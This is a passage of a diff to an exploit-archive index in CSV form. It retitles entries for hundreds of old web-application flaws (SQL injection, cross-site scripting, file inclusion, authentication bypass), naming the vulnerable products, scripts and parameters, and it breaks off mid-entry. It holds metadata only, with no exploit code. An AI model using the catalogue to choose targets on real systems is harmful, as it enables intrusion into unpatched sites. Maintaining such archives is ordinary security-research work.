25485,platforms/asp/webapps/25485.txt,"DUportal 3.1.2 - type.asp iCat Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 -25484,platforms/asp/webapps/25484.txt,"DUportal 3.1.2 - inc_rating.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 +25484,platforms/asp/webapps/25484.txt,"DUportal 3.1.2 - 'inc_rating.asp' Multiple Parameter SQL Injections",2005-04-20,Dcrab,asp,webapps,0 25488,platforms/php/webapps/25488.txt,"ProfitCode Software PayProCart 3.0 - 'Username' Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 25489,platforms/php/webapps/25489.txt,"ProfitCode Software PayProCart 3.0 - Ckprvd Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 25490,platforms/php/webapps/25490.txt,"ProfitCode Software PayProCart 3.0 - AdminShop HDoc Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 @@ -28028,7 +28039,7 @@ id,file,description,date,author,platform,type,port 25523,platforms/php/webapps/25523.txt,"phpBB 2.0.x - profile.php Cross-Site Scripting",2005-04-23,HaCkZaTaN,php,webapps,0 25524,platforms/php/webapps/25524.txt,"phpBB 2.0.x - viewtopic.php Cross-Site Scripting",2005-04-23,HaCkZaTaN,php,webapps,0 25528,platforms/php/webapps/25528.txt,"WoltLab Burning Board 2.3.1 - PMS.php Cross-Site Scripting",2005-04-25,deluxe89,php,webapps,0 -25529,platforms/asp/webapps/25529.txt,"StorePortal 2.63 - default.asp Multiple SQL Injection",2005-04-25,Dcrab,asp,webapps,0 +25529,platforms/asp/webapps/25529.txt,"StorePortal 2.63 - 'default.asp' Multiple SQL Injections",2005-04-25,Dcrab,asp,webapps,0 25530,platforms/asp/webapps/25530.txt,"OneWorldStore - IDOrder Information Disclosure",2005-04-25,Lostmon,asp,webapps,0 25531,platforms/php/webapps/25531.html,"PHPMyVisites 1.3 - Set_Lang File Inclusion",2005-04-26,"Max Cerny",php,webapps,0 25532,platforms/php/webapps/25532.txt,"Yappa-ng 1.x/2.x - Unspecified Remote File Inclusion",2005-04-24,"James Bercegay",php,webapps,0 @@ -28042,14 +28053,14 @@ id,file,description,date,author,platform,type,port 25540,platforms/asp/webapps/25540.txt,"MetaCart2 - StrSubCatalogID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 25541,platforms/asp/webapps/25541.txt,"MetaCart2 - CurCatalogID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 25542,platforms/asp/webapps/25542.txt,"MetaCart2 - strSubCatalog_NAME Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 -25543,platforms/asp/webapps/25543.txt,"MetaCart2 - SearchAction.asp Multiple SQL Injection",2005-04-26,Dcrab,asp,webapps,0 +25543,platforms/asp/webapps/25543.txt,"MetaCart2 - 'SearchAction.asp' Multiple SQL Injections",2005-04-26,Dcrab,asp,webapps,0 25544,platforms/asp/webapps/25544.txt,"MetaBid Auctions - intAuctionID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 25545,platforms/php/webapps/25545.txt,"BBlog 0.7.4 - 'PostID' Parameter SQL Injection",2004-04-26,jericho+bblog@attrition.org,php,webapps,0 25548,platforms/php/webapps/25548.txt,"PHPCart - Input Validation",2005-04-27,Lostmon,php,webapps,0 25549,platforms/php/webapps/25549.txt,"Claroline 1.5/1.6 - toolaccess_details.php tool Parameter Cross-Site Scripting",2005-04-27,"Sieg Fried",php,webapps,0 25550,platforms/php/webapps/25550.txt,"Claroline 1.5/1.6 - user_access_details.php data Parameter Cross-Site Scripting",2005-04-27,"Sieg Fried",php,webapps,0 25551,platforms/php/webapps/25551.txt,"Claroline 1.5/1.6 - myagenda.php coursePath Parameter Cross-Site Scripting",2005-04-27,"Sieg Fried",php,webapps,0 -25552,platforms/php/webapps/25552.txt,"Claroline E-Learning 1.5/1.6 - userInfo.php Multiple Parameter SQL Injection",2005-04-27,"Sieg Fried",php,webapps,0 +25552,platforms/php/webapps/25552.txt,"Claroline E-Learning 1.5/1.6 - 'userInfo.php' Multiple Parameter SQL Injections",2005-04-27,"Sieg Fried",php,webapps,0 25553,platforms/php/webapps/25553.txt,"Claroline E-Learning 1.5/1.6 - exercises_details.php exo_id Parameter SQL Injection",2005-04-27,"Sieg Fried",php,webapps,0 25555,platforms/php/webapps/25555.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' P Parameter SQL Injection",2005-04-27,"CENSORED Search Vulnerabilities",php,webapps,0 25556,platforms/php/webapps/25556.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' Q Parameter SQL Injection",2005-04-27,"CENSORED Search Vulnerabilities",php,webapps,0 @@ -28061,7 +28072,7 @@ id,file,description,date,author,platform,type,port 25567,platforms/php/webapps/25567.txt,"Just William's Amazon Webstore - HTTP Response Splitting",2005-04-28,Lostmon,php,webapps,0 25568,platforms/php/webapps/25568.txt,"phpCOIN 1.2 - 'login.php' PHPcoinsessid Parameter SQL Injection",2005-04-28,Dcrab,php,webapps,0 25569,platforms/php/webapps/25569.txt,"phpCOIN 1.2 Pages Module - Multiple Parameter SQL Injection",2005-04-28,Dcrab,php,webapps,0 -25570,platforms/php/webapps/25570.txt,"JGS-Portal 3.0.1 - ID Variable SQL Injection",2005-04-30,admin@batznet.com,php,webapps,0 +25570,platforms/php/webapps/25570.txt,"JGS-Portal 3.0.1 - 'ID' Parameter SQL Injection",2005-04-30,admin@batznet.com,php,webapps,0 25575,platforms/php/webapps/25575.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - basket.php Multiple Parameter Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0 25576,platforms/php/webapps/25576.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'page.php' page Parameter Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0 25577,platforms/php/webapps/25577.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - reviews.php Multiple Parameter Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0 @@ -28158,11 +28169,11 @@ id,file,description,date,author,platform,type,port 25704,platforms/php/webapps/25704.txt,"PHP Poll Creator 1.0.1 - Poll_Vote.php Remote File Inclusion",2005-05-25,"rash ilusion",php,webapps,0 25705,platforms/asp/webapps/25705.txt,"FunkyASP AD Systems 1.1 - 'login.asp' SQL Injection",2005-05-25,Romty,asp,webapps,0 25715,platforms/hardware/webapps/25715.py,"HP LaserJet Pro P1606dn - Webadmin Password Reset",2013-05-26,m3tamantra,hardware,webapps,0 -25716,platforms/php/webapps/25716.py,"AVE.CMS 2.09 - 'index.php module Parameter' Blind SQL Injection",2013-05-26,mr.pr0n,php,webapps,0 +25716,platforms/php/webapps/25716.py,"AVE.CMS 2.09 - 'index.php' 'module' Parameter Blind SQL Injection",2013-05-26,mr.pr0n,php,webapps,0 25721,platforms/php/webapps/25721.txt,"WordPress Plugin User Role Editor 3.12 - Cross-Site Request Forgery",2013-05-26,"Henry Hoggard",php,webapps,0 25723,platforms/php/webapps/25723.txt,"WordPress Plugin Spider Event Calendar 1.3.0 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps,0 25724,platforms/php/webapps/25724.txt,"WordPress Plugin Spider Catalog 1.4.6 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps,0 -25726,platforms/php/webapps/25726.txt,"RadioCMS 2.2 - 'menager.php playlist_id Parameter' SQL Injection",2013-05-26,Rooster(XEKA),php,webapps,0 +25726,platforms/php/webapps/25726.txt,"RadioCMS 2.2 - 'menager.php' 'playlist_id' Parameter SQL Injection",2013-05-26,Rooster(XEKA),php,webapps,0 25727,platforms/php/webapps/25727.txt,"BookReview 1.0 - add_review.htm Multiple Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 25728,platforms/php/webapps/25728.txt,"BookReview 1.0 - add_contents.htm Multiple Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 25729,platforms/php/webapps/25729.txt,"BookReview 1.0 - suggest_category.htm node Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 @@ -28179,7 +28190,7 @@ id,file,description,date,author,platform,type,port 25742,platforms/php/webapps/25742.txt,"NPDS 4.8 < 5.0 - admin.php language Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 25743,platforms/php/webapps/25743.txt,"NPDS 4.8 < 5.0 - powerpack_f.php language Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 25744,platforms/php/webapps/25744.txt,"NPDS 4.8 < 5.0 - sdv_infos.php sitename Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 -25745,platforms/php/webapps/25745.txt,"NPDS 4.8 - /5.0 modules.php Lettre Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 +25745,platforms/php/webapps/25745.txt,"NPDS 4.8 /5.0 - 'modules.php' Lettre Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 25746,platforms/php/webapps/25746.txt,"NPDS 4.8 < 5.0 - reviews.php title Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 25747,platforms/php/webapps/25747.txt,"NPDS 4.8 < 5.0 - reply.php image_subject Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 25748,platforms/php/webapps/25748.txt,"NPDS 4.8 < 5.0 - Glossaire Module terme Parameter SQL Injection",2005-05-28,NoSP,php,webapps,0 @@ -28216,7 +28227,7 @@ id,file,description,date,author,platform,type,port 33419,platforms/php/webapps/33419.txt,"F3Site 2009 - mod/poll.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,cr4wl3r,php,webapps,0 33420,platforms/php/webapps/33420.txt,"F3Site 2009 - 'mod/new.php' GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,cr4wl3r,php,webapps,0 40390,platforms/php/webapps/40390.php,"BuilderEngine 3.5.0 - Arbitrary File Upload",2016-09-19,metanubix,php,webapps,80 -33421,platforms/php/webapps/33421.txt,"Ampache 3.4.3 - 'login.php' Multiple SQL Injection",2009-12-18,R3d-D3V!L,php,webapps,0 +33421,platforms/php/webapps/33421.txt,"Ampache 3.4.3 - 'login.php' Multiple SQL Injections",2009-12-18,R3d-D3V!L,php,webapps,0 33422,platforms/php/webapps/33422.txt,"JBC Explorer 7.20 - 'arbre.php' Cross-Site Scripting",2009-12-20,Metropolis,php,webapps,0 33424,platforms/php/webapps/33424.txt,"Kasseler CMS 1.3.4 Lite - Multiple Cross-Site Scripting Vulnerabilities",2009-12-21,Gamoscu,php,webapps,0 33425,platforms/php/webapps/33425.py,"SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation",2014-05-19,"Gregory Draperi",php,webapps,80 @@ -28238,7 +28249,7 @@ id,file,description,date,author,platform,type,port 25796,platforms/asp/webapps/25796.txt,"Early Impact ProductCart 2.6/2.7 - editCategories.asp lid Parameter SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 25797,platforms/asp/webapps/25797.txt,"Early Impact ProductCart 2.6/2.7 - modCustomCardPaymentOpt.asp idc Parameter SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 25798,platforms/asp/webapps/25798.txt,"Early Impact ProductCart 2.6/2.7 - OptionFieldsEdit.asp idccr Parameter SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 -25799,platforms/php/webapps/25799.txt,"FlatNuke 2.5.x - 'index.php' where Variable Full Path Disclosure",2005-06-07,SecWatch,php,webapps,0 +25799,platforms/php/webapps/25799.txt,"FlatNuke 2.5.x - 'index.php' 'where' Parameter Full Path Disclosure",2005-06-07,SecWatch,php,webapps,0 25800,platforms/php/webapps/25800.txt,"FlatNuke 2.5.x - help.php Multiple Parameter Cross-Site Scripting",2005-06-07,SecWatch,php,webapps,0 25801,platforms/php/webapps/25801.php,"FlatNuke 2.5.x - referer.php Crafted Referer Arbitrary PHP Code Execution",2005-06-07,SecWatch,php,webapps,0 25803,platforms/php/webapps/25803.txt,"Cerberus Helpdesk 0.97.3/2.6.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-06-08,"Dedi Dwianto",php,webapps,0 @@ -28307,14 +28318,14 @@ id,file,description,date,author,platform,type,port 25885,platforms/php/webapps/25885.txt,"CarLine Forum Russian Board 4.2 - edit_msg.php Multiple Parameter Cross-Site Scripting",2005-06-23,1dt.w0lf,php,webapps,0 25886,platforms/php/webapps/25886.txt,"CarLine Forum Russian Board 4.2 - menu_header.php table_sql Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 25887,platforms/php/webapps/25887.txt,"CarLine Forum Russian Board 4.2 - set.php name_ig_array[1] Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 -25888,platforms/php/webapps/25888.txt,"CarLine Forum Russian Board 4.2 - reply_in.php Multiple Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 +25888,platforms/php/webapps/25888.txt,"CarLine Forum Russian Board 4.2 - 'reply_in.php' Multiple Parameter SQL Injections",2005-06-23,1dt.w0lf,php,webapps,0 25889,platforms/php/webapps/25889.txt,"CarLine Forum Russian Board 4.2 - reply.php name_ig_array1[1] Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 25890,platforms/php/webapps/25890.txt,"CarLine Forum Russian Board 4.2 - 'new.php' name_ig_array1[1] Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 25891,platforms/php/webapps/25891.txt,"CarLine Forum Russian Board 4.2 - edit_msg.php name_ig_array1[1] Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 -25892,platforms/php/webapps/25892.txt,"CarLine Forum Russian Board 4.2 - memory.php Multiple Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 -25893,platforms/php/webapps/25893.txt,"CarLine Forum Russian Board 4.2 - line.php Multiple Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 -25894,platforms/php/webapps/25894.txt,"CarLine Forum Russian Board 4.2 - in.php Multiple Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 -25895,platforms/php/webapps/25895.txt,"CarLine Forum Russian Board 4.2 - enter.php Multiple Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 +25892,platforms/php/webapps/25892.txt,"CarLine Forum Russian Board 4.2 - 'memory.php' Multiple Parameter SQL Injections",2005-06-23,1dt.w0lf,php,webapps,0 +25893,platforms/php/webapps/25893.txt,"CarLine Forum Russian Board 4.2 - 'line.php' Multiple Parameter SQL Injections",2005-06-23,1dt.w0lf,php,webapps,0 +25894,platforms/php/webapps/25894.txt,"CarLine Forum Russian Board 4.2 - 'in.php' Multiple Parameter SQL Injections",2005-06-23,1dt.w0lf,php,webapps,0 +25895,platforms/php/webapps/25895.txt,"CarLine Forum Russian Board 4.2 - 'enter.php' Multiple Parameter SQL Injections",2005-06-23,1dt.w0lf,php,webapps,0 25897,platforms/php/webapps/25897.txt,"UBBCentral UBB.Threads 5.5.1/6.x - download.php Number Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 25898,platforms/php/webapps/25898.txt,"UBBCentral UBB.Threads 5.5.1/6.x - calendar.php Multiple Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 25899,platforms/php/webapps/25899.txt,"UBBCentral UBB.Threads 5.5.1/6.x - modifypost.php Number Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 @@ -28338,7 +28349,7 @@ id,file,description,date,author,platform,type,port 25920,platforms/cgi/webapps/25920.pl,"Community Link Pro - login.cgi File Parameter Remote Command Execution",2005-06-29,spher3,cgi,webapps,0 25922,platforms/asp/webapps/25922.txt,"CyberStrong EShop 4.2 - 20review.asp SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 25923,platforms/asp/webapps/25923.txt,"CyberStrong eShop 4.2 - 10expand.asp SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 -25926,platforms/php/webapps/25926.txt,"osTicket 1.2/1.3 - view.php inc Variable Arbitrary Local File Inclusion",2005-06-30,"edisan & foster",php,webapps,0 +25926,platforms/php/webapps/25926.txt,"osTicket 1.2/1.3 - 'view.php' 'inc' Parameter Arbitrary Local File Inclusion",2005-06-30,"edisan & foster",php,webapps,0 25924,platforms/asp/webapps/25924.txt,"fsboard 2.0 - Directory Traversal",2005-06-30,ActualMInd,asp,webapps,0 25925,platforms/asp/webapps/25925.txt,"CyberStrong EShop 4.2 - 10browse.asp SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 25928,platforms/php/webapps/25928.txt,"EasyPHPCalendar 6.1.5/6.2.x - calendar.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 @@ -28373,7 +28384,7 @@ id,file,description,date,author,platform,type,port 25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0 25969,platforms/hardware/webapps/25969.txt,"Netgear WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0 25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php' Remote / Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 -25973,platforms/php/webapps/25973.txt,"Ruubikcms 1.1.1 - 'tinybrowser.php folder Parameter' Directory Traversal",2013-06-05,expl0i13r,php,webapps,0 +25973,platforms/php/webapps/25973.txt,"Ruubikcms 1.1.1 - 'tinybrowser.php' 'folder' Parameter Directory Traversal",2013-06-05,expl0i13r,php,webapps,0 25976,platforms/hardware/webapps/25976.txt,"DS3 - Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",hardware,webapps,0 25977,platforms/jsp/webapps/25977.txt,"Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",jsp,webapps,0 25978,platforms/hardware/webapps/25978.txt,"Netgear DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",hardware,webapps,80 @@ -28500,7 +28511,7 @@ id,file,description,date,author,platform,type,port 26127,platforms/php/webapps/26127.txt,"TriggerTG TClanPortal 3.0 - Multiple SQL Injections",2005-08-09,admin@batznet.com,php,webapps,0 26129,platforms/hardware/webapps/26129.txt,"Buffalo WZR-HP-G300NH2 - Cross-Site Request Forgery",2013-06-11,"Prayas Kulshrestha",hardware,webapps,0 26132,platforms/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection",2013-06-11,"CWH Underground",php,webapps,0 -26136,platforms/php/webapps/26136.txt,"Simple PHP Agenda 2.2.8 - 'edit_event.php eventid Parameter' SQL Injection",2013-06-11,"Anthony Dubuissez",php,webapps,0 +26136,platforms/php/webapps/26136.txt,"Simple PHP Agenda 2.2.8 - 'edit_event.php' 'eventid' Parameter SQL Injection",2013-06-11,"Anthony Dubuissez",php,webapps,0 26140,platforms/php/webapps/26140.txt,"ezUpload 2.2 - 'index.php' path Parameter Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 26141,platforms/php/webapps/26141.txt,"ezUpload 2.2 - initialize.php path Parameter Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 26142,platforms/php/webapps/26142.txt,"ezUpload 2.2 - customize.php path Parameter Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 @@ -28517,7 +28528,7 @@ id,file,description,date,author,platform,type,port 26156,platforms/asp/webapps/26156.txt,"CPaint 1.3 - xmlhttp Request Input Validation",2005-08-16,"Thor Larholm",asp,webapps,0 26157,platforms/php/webapps/26157.txt,"ECW Shop 6.0.2 - 'index.php' Cross-Site Scripting",2005-08-16,"John Cobb",php,webapps,0 26158,platforms/php/webapps/26158.txt,"Soft4e ECW-Shop 6.0.2 - 'index.php' HTML Injection",2005-08-16,"John Cobb",php,webapps,0 -26159,platforms/php/webapps/26159.txt,"PHPFreeNews 1.40 - searchresults.php Multiple SQL Injection",2005-08-17,h4cky,php,webapps,0 +26159,platforms/php/webapps/26159.txt,"PHPFreeNews 1.40 - searchresults.php Multiple SQL Injections",2005-08-17,h4cky,php,webapps,0 26160,platforms/php/webapps/26160.txt,"PHPFreeNews 1.40 - NewsCategoryForm.php NewsMode Parameter Cross-Site Scripting",2005-08-17,h4cky,php,webapps,0 26161,platforms/php/webapps/26161.txt,"PHPFreeNews 1.40 - searchresults.php Multiple Parameter Cross-Site Scripting",2005-08-17,h4cky,php,webapps,0 26162,platforms/php/webapps/26162.txt,"PHPTB Topic Board 2.0 - admin_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 @@ -28600,22 +28611,22 @@ id,file,description,date,author,platform,type,port 26266,platforms/php/webapps/26266.txt,"DeluxeBB 1.0 - 'forums.php' SQL Injection",2005-09-15,abducter,php,webapps,0 26267,platforms/php/webapps/26267.txt,"DeluxeBB 1.0 - 'pm.php' SQL Injection",2005-09-15,abducter,php,webapps,0 26268,platforms/php/webapps/26268.txt,"DeluxeBB 1.0 - 'newpost.php' SQL Injection",2005-09-15,abducter,php,webapps,0 -26333,platforms/asp/webapps/26333.html,"Aenovo - /Password/default.asp Password Field SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 -26334,platforms/asp/webapps/26334.txt,"Aenovo - /incs/searchdisplay.asp strSQL Parameter SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 +26333,platforms/asp/webapps/26333.html,"Aenovo - '/Password/default.asp' Password Field SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 +26334,platforms/asp/webapps/26334.txt,"Aenovo - '/incs/searchdisplay.asp' strSQL Parameter SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 26270,platforms/php/webapps/26270.txt,"Content2Web 1.0.1 - Multiple Input Validation Vulnerabilities",2005-09-16,"Security Tester",php,webapps,0 26272,platforms/php/webapps/26272.txt,"EPay Pro 2.0 - 'index.php' Directory Traversal",2005-09-19,h4cky0u,php,webapps,0 26273,platforms/php/webapps/26273.txt,"vBulletin 1.0.1 lite/2.x/3.0 - joinrequests.php request Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 -26274,platforms/php/webapps/26274.txt,"vBulletin 1.0.1 lite/2.x/3.0 - /admincp/user.php Multiple Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 -26275,platforms/php/webapps/26275.txt,"vBulletin 1.0.1 lite/2.x/3.0 - /admincp/usertitle.php usertitleid Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 -26276,platforms/php/webapps/26276.txt,"vBulletin 1.0.1 lite/2.x/3.0 - /admincp/usertools.php ids Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 -26277,platforms/php/webapps/26277.txt,"NooToplist 1.0 - 'index.php' Multiple SQL Injection",2005-09-19,"David Sopas Ferreira",php,webapps,0 -26278,platforms/php/webapps/26278.txt,"vBulletin 1.0.1 lite/2.x/3.0 - /admincp/css.php group Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 -26279,platforms/php/webapps/26279.txt,"vBulletin 1.0.1 lite/2.x/3.0 - /admincp/index.php Multiple Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 -26280,platforms/php/webapps/26280.txt,"vBulletin 1.0.1 lite/2.x/3.0 - /admincp/user.php email Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 -26281,platforms/php/webapps/26281.txt,"vBulletin 1.0.1 lite/2.x/3.0 - /admincp/language.php goto Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 -26282,platforms/php/webapps/26282.txt,"vBulletin 1.0.1 lite/2.x/3.0 - /admincp/modlog.php orderby Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 -26283,platforms/php/webapps/26283.txt,"vBulletin 1.0.1 lite/2.x/3.0 - /admincp/template.php Multiple Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 -26284,platforms/php/webapps/26284.txt,"MX Shop 3.2 - 'index.php' Multiple SQL Injection",2005-09-19,"David Sopas Ferreira",php,webapps,0 +26274,platforms/php/webapps/26274.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php' Multiple Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 +26275,platforms/php/webapps/26275.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertitle.php' 'usertitleid' Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 +26276,platforms/php/webapps/26276.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertools.php' 'ids' Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 +26277,platforms/php/webapps/26277.txt,"NooToplist 1.0 - 'index.php' Multiple SQL Injections",2005-09-19,"David Sopas Ferreira",php,webapps,0 +26278,platforms/php/webapps/26278.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/css.php' 'group' Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 +26279,platforms/php/webapps/26279.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/index.php' Multiple Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 +26280,platforms/php/webapps/26280.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php' 'email' Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 +26281,platforms/php/webapps/26281.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/language.php' 'goto' Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 +26282,platforms/php/webapps/26282.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/modlog.php' 'orderby' Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 +26283,platforms/php/webapps/26283.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/template.php' Multiple Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 +26284,platforms/php/webapps/26284.txt,"MX Shop 3.2 - 'index.php' Multiple SQL Injections",2005-09-19,"David Sopas Ferreira",php,webapps,0 26285,platforms/php/webapps/26285.txt,"Hesk 0.92/0.93 - Session ID Authentication Bypass",2005-09-20,"Rajesh Sethumadhavan",php,webapps,0 26286,platforms/php/webapps/26286.txt,"PHP Advanced Transfer Manager 1.30 - Multiple Directory Traversal Vulnerabilities",2005-09-20,rgod,php,webapps,0 26287,platforms/php/webapps/26287.txt,"PHP Advanced Transfer Manager 1.30 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-20,rgod,php,webapps,0 @@ -28690,7 +28701,7 @@ id,file,description,date,author,platform,type,port 26399,platforms/php/webapps/26399.txt,"Belchior Foundry VCard 2.9 - Remote File Inclusion",2005-10-26,X,php,webapps,0 26400,platforms/php/webapps/26400.txt,"Flyspray 0.9 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-26,Lostmon,php,webapps,0 26401,platforms/hardware/webapps/26401.txt,"TRENDnet TE100-P1U Print Server Firmware 4.11 - Authentication Bypass",2013-06-24,Chako,hardware,webapps,0 -26405,platforms/php/webapps/26405.txt,"Top Games Script 1.2 - 'play.php gid Parameter' SQL Injection",2013-06-24,AtT4CKxT3rR0r1ST,php,webapps,0 +26405,platforms/php/webapps/26405.txt,"Top Games Script 1.2 - 'play.php' 'gid' Parameter SQL Injection",2013-06-24,AtT4CKxT3rR0r1ST,php,webapps,0 26406,platforms/php/webapps/26406.txt,"Alienvault Open Source SIEM (OSSIM) 4.1 - Multiple SQL Injection Vulnerabilities",2013-06-24,"Glafkos Charalambous",php,webapps,0 27541,platforms/php/webapps/27541.txt,"DbbS 2.0 - Topics.php SQL Injection",2006-03-31,DaBDouB-MoSiKaR,php,webapps,0 27542,platforms/php/webapps/27542.txt,"SoftBiz Image Gallery - mage_desc.php Multiple Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 @@ -28699,10 +28710,10 @@ id,file,description,date,author,platform,type,port 26410,platforms/php/webapps/26410.py,"Collabtive 1.0 - 'manageuser.php' SQL Injection",2013-06-24,drone,php,webapps,0 26414,platforms/php/webapps/26414.txt,"PodHawk 1.85 - Arbitrary File Upload",2013-06-24,"CWH Underground",php,webapps,0 26415,platforms/hardware/webapps/26415.txt,"Linksys X3000 1.0.03 build 001 - Multiple Vulnerabilities",2013-06-24,m-1-k-3,hardware,webapps,0 -26416,platforms/php/webapps/26416.txt,"Elemata CMS RC3.0 - 'global.php id Parameter' SQL Injection",2013-06-24,"CWH Underground",php,webapps,0 +26416,platforms/php/webapps/26416.txt,"Elemata CMS RC3.0 - 'global.php' 'id' Parameter SQL Injection",2013-06-24,"CWH Underground",php,webapps,0 26827,platforms/php/webapps/26827.txt,"QuickPayPro 3.1 - popups.edit.php popupid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26423,platforms/php/webapps/26423.txt,"Mantis 0.19.2/1.0 - 'Bug_sponsorship_list_view_inc.php' File Inclusion",2005-10-26,"Andreas Sandblad",php,webapps,0 -26425,platforms/php/webapps/26425.pl,"Woltlab 1.1/2.x - Info-DB Info_db.php Multiple SQL Injection",2005-10-26,admin@batznet.com,php,webapps,0 +26425,platforms/php/webapps/26425.pl,"Woltlab 1.1/2.x - 'Info-DB Info_db.php' Multiple SQL Injections",2005-10-26,admin@batznet.com,php,webapps,0 26426,platforms/asp/webapps/26426.html,"Techno Dreams Multiple Scripts - Multiple SQL Injections",2005-10-26,"farhad koosha",asp,webapps,0 26427,platforms/php/webapps/26427.txt,"GCards 1.43 - 'news.php' SQL 